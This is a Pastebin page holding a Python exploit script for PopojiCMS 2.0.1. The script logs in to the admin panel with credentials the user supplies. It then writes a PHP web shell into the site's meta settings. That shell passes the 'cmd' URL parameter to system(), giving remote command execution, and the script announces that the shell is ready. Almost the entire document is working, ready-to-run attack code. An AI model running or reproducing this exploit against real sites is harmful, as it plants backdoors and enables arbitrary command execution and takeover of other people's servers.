Advertisement
FlyFar

PopojiCMS 2.0.1 - Remote Command Execution (RCE)

May 19th, 2024
944
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.80 KB | Cybersecurity | 0 0
  1. # Exploit Title: PopojiCMS 2.0.1 - Remote Command Execution
  2. # Date: 14/04/2024
  3. # Exploit Author: Ahmet Ümit BAYRAM
  4. # Vendor Homepage: https://www.popojicms.org/
  5. # Software Link:
  6. https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip
  7. # Version: Version : 2.0.1
  8. # Tested on: https://www.softaculous.com/apps/cms/PopojiCMS
  9.  
  10. import requests
  11. import time
  12. import sys
  13.  
  14. def exploit(url, username, password):
  15.  
  16. login_url = f"{url}/po-admin/route.php?mod=login&act=proclogin"
  17. login_data = {"username": username, "password": password}
  18. headers = {"Content-Type": "application/x-www-form-urlencoded", "Referer": f
  19. "{url}/po-admin/index.php"}
  20. session = requests.Session()
  21. login_response = session.post(login_url, data=login_data, headers=headers)
  22. if "Administrator PopojiCMS" in login_response.text:
  23. print("Login Successful!")
  24. time.sleep(1) # 1 saniye bekle
  25. else:
  26. print("Login Failed!")
  27. return
  28.  
  29. edit_url = f"{url}/po-admin/route.php?mod=setting&act=metasocial"
  30. edit_data = {"meta_content": """<html>
  31. <body>
  32. <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
  33. <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
  34. <input type="SUBMIT" value="Execute">
  35. </form>
  36. <pre>
  37. <?php
  38. if(isset($_GET['cmd']))
  39. {
  40. system($_GET['cmd']);
  41. }
  42. ?>
  43. </pre>
  44. </body>
  45. </html>"""}
  46. edit_response = session.post(edit_url, data=edit_data, headers=headers)
  47. if "cmd" in edit_response.text:
  48. print("Your shell is ready:", url)
  49. time.sleep(1)
  50. else:
  51. print("Exploit Failed!")
  52. return
  53.  
  54. if __name__ == "__main__":
  55. if len(sys.argv) != 4:
  56. print("Kullanım: python exploit.py sitename username password")
  57. sys.exit(1)
  58.  
  59. url = sys.argv[1]
  60. username = sys.argv[2]
  61. password = sys.argv[3]
  62. print("Exploiting...")
  63. time.sleep(1)
  64. print("Logging in...")
  65. time.sleep(1)
  66. exploit(url, username, password)
  67.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement